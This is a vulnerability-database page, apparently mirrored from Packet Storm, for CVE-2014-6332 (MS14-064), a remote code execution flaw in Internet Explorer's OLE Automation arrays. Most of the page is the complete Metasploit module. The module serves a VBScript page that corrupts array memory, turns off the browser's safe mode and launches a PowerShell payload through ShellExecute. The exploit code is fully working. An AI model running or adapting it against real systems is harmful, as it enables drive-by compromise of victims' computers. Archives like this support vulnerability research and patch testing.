Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Windows OLE Automation Array Remote Code Execution

🗓️ 13 Nov 2014 00:00:00Reported by IBMType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 73 Views

Windows OLE Automation Array Remote Code Execution in Internet Explore

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Internet Explorer OLE Automation Array Remote Code Execution Exploit
13 Nov 201400:00
zdt
0day.today		Internet Explorer OLE Automation Array Remote Code Execution (msf) Exploit
13 Nov 201400:00
zdt
0day.today		Microsoft Internet Explorer Windows OLE Automation Array Remote Code Execution Exploit
1 Dec 201400:00
zdt
0day.today		IBM Security AppScan Standard <= 9.0.2 - OLE Automation Array Remote Code Execution Exploit
2 Jun 201500:00
zdt
0day.today		Havij - OLE Automation Array Remote Code Execution Exploit
1 Jul 201500:00
zdt
0day.today		Internet Download Manager - OLE Automation Array Remote Code Execution Exploit
21 Jul 201500:00
zdt
0day.today		Microsoft Windows HTA (HTML Application) - Remote Code Execution Exploit
15 Aug 201500:00
zdt
0day.today		HTML Compiler - Remote Code Execution Exploit
20 Oct 201500:00
zdt
0day.today		The World Browser 3.0 Final - Remote Code Execution Exploit
22 Oct 201500:00
zdt
GithubExploit		Exploit for Out-of-bounds Write in Microsoft
10 Jul 201819:31
githubexploit
Rows per page
`##  
# This module requires Metasploit: http://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
require 'msf/core'  
require 'msf/core/exploit/powershell'  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::Remote::HttpServer::HTML  
include Msf::Exploit::Powershell  
  
def initialize(info={})  
super(update_info(info,  
'Name' => "Windows OLE Automation Array Remote Code Execution",  
'Description' => %q{  
This modules exploits the Windows OLE Automation Array Remote Code Execution Vulnerability.   
Internet MS-14-064, CVE-2014-6332. The vulnerability exists in Internet Explorer 3.0 until version 11 within Windows95 up to Windows 10.   
},  
'License' => MSF_LICENSE,  
'Author' =>  
[  
'IBM', # Discovery  
'yuange <twitter.com/yuange75>', # PoC  
'Rik van Duijn <twitter.com/rikvduijn>', #Metasploit  
'Wesley Neelen <security[at]forsec.nl>' #Metasploit  
],  
'References' =>  
[  
[ 'CVE', '2014-6332' ]  
],  
'Payload' =>  
{  
'BadChars' => "\x00",  
},  
'DefaultOptions' =>  
{  
'EXITFUNC' => "none"  
},  
'Platform' => 'win',  
'Targets' =>   
[  
[ 'Automatic', {} ]  
],  
'Privileged' => false,  
'DisclosureDate' => "November 12 2014",  
'DefaultTarget' => 0))  
end  
  
def on_request_uri(cli, request)  
payl = cmd_psh_payload(payload.encoded,"x86",{ :remove_comspec => true })  
payl.slice! "powershell.exe "  
  
html = <<-EOS  
<!doctype html>  
  
<html>  
  
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >  
  
<head>  
  
</head>  
  
<body>  
  
  
<SCRIPT LANGUAGE="VBScript">  
  
  
function trigger()   
  
On Error Resume Next  
  
set shell=createobject("Shell.Application")  
  
shell.ShellExecute "powershell.exe", "#{payl}", "", "open", 1  
  
end function  
  
  
</script>  
  
  
<SCRIPT LANGUAGE="VBScript">  
  
  
  
dim aa()  
  
dim ab()  
  
dim a0  
  
dim a1  
  
dim a2  
  
dim a3  
  
dim win9x  
  
dim intVersion  
  
dim rnda  
  
dim funclass  
  
dim myarray  
  
  
Begin()  
  
  
function Begin()  
  
On Error Resume Next  
  
info=Navigator.UserAgent  
  
  
if(instr(info,"Win64")>0) then  
  
exit function  
  
end if  
  
  
if (instr(info,"MSIE")>0) then   
  
intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2))   
  
else  
  
exit function   
  
  
  
end if  
  
  
win9x=0  
  
  
BeginInit()  
  
If Create()=True Then  
  
myarray= chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)  
  
myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)  
  
  
if(intVersion<4) then  
  
document.write("<br> IE")  
  
document.write(intVersion)  
  
runshellcode()   
  
else   
  
setnotsafemode()  
  
end if  
  
end if  
  
end function  
  
  
function BeginInit()  
  
Randomize()  
  
redim aa(5)  
  
redim ab(5)  
  
a0=13+17*rnd(6)  
  
a3=7+3*rnd(5)  
  
end function  
  
  
function Create()  
  
On Error Resume Next  
  
dim i  
  
Create=False  
  
For i = 0 To 400  
  
If Over()=True Then  
  
' document.write(i)   
  
Create=True  
  
Exit For  
  
End If   
  
Next  
  
end function  
  
  
sub testaa()  
  
end sub  
  
  
function mydata()  
  
On Error Resume Next  
  
i=testaa  
  
i=null  
  
redim Preserve aa(a2)   
  
  
  
ab(0)=0  
  
aa(a1)=i  
  
ab(0)=6.36598737437801E-314  
  
  
aa(a1+2)=myarray  
  
ab(2)=1.74088534731324E-310   
  
mydata=aa(a1)  
  
redim Preserve aa(a0)   
  
end function   
  
  
  
function setnotsafemode()  
  
On Error Resume Next  
  
i=mydata()   
  
i=readmemo(i+8)  
  
i=readmemo(i+16)  
  
j=readmemo(i+&h134)   
  
for k=0 to &h60 step 4  
  
j=readmemo(i+&h120+k)  
  
if(j=14) then  
  
j=0   
  
redim Preserve aa(a2)   
  
aa(a1+2)(i+&h11c+k)=ab(4)  
  
redim Preserve aa(a0)   
  
  
j=0   
  
j=readmemo(i+&h120+k)   
  
  
  
Exit for  
  
end if  
  
  
next   
  
ab(2)=1.69759663316747E-313  
  
trigger()   
  
end function  
  
  
function Over()  
  
On Error Resume Next  
  
dim type1,type2,type3  
  
Over=False  
  
a0=a0+a3  
  
a1=a0+2  
  
a2=a0+&h8000000  
  
  
  
redim Preserve aa(a0)   
  
redim ab(a0)   
  
  
  
redim Preserve aa(a2)  
  
  
  
type1=1  
  
ab(0)=1.123456789012345678901234567890  
  
aa(a0)=10  
  
  
  
If(IsObject(aa(a1-1)) = False) Then  
  
if(intVersion<4) then  
  
mem=cint(a0+1)*16   
  
j=vartype(aa(a1-1))  
  
if((j=mem+4) or (j*8=mem+8)) then  
  
if(vartype(aa(a1-1))<>0) Then   
  
If(IsObject(aa(a1)) = False ) Then   
  
type1=VarType(aa(a1))  
  
end if   
  
end if  
  
else  
  
redim Preserve aa(a0)  
  
exit function  
  
  
end if   
  
else  
  
if(vartype(aa(a1-1))<>0) Then   
  
If(IsObject(aa(a1)) = False ) Then  
  
type1=VarType(aa(a1))  
  
end if   
  
end if  
  
end if  
  
end if  
  
  
  
  
  
If(type1=&h2f66) Then   
  
Over=True   
  
End If   
  
If(type1=&hB9AD) Then  
  
Over=True  
  
win9x=1  
  
End If   
  
  
redim Preserve aa(a0)   
  
  
  
end function  
  
  
function ReadMemo(add)   
  
On Error Resume Next  
  
redim Preserve aa(a2)   
  
  
  
ab(0)=0   
  
aa(a1)=add+4   
  
ab(0)=1.69759663316747E-313   
  
ReadMemo=lenb(aa(a1))   
  
  
  
ab(0)=0   
  
  
  
redim Preserve aa(a0)  
  
end function  
  
  
</script>  
  
  
</body>  
  
</html>  
EOS  
  
print_status("Sending html")  
send_response(cli, html, {'Content-Type'=>'text/html'})  
  
end  
  
end  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
13 Nov 2014 00:00Current
0.3Low risk
Vulners AI Score0.3
EPSS0.94094
vulnerabilityinternet explorerremote code executionole automation arraywindowsmetasploit
73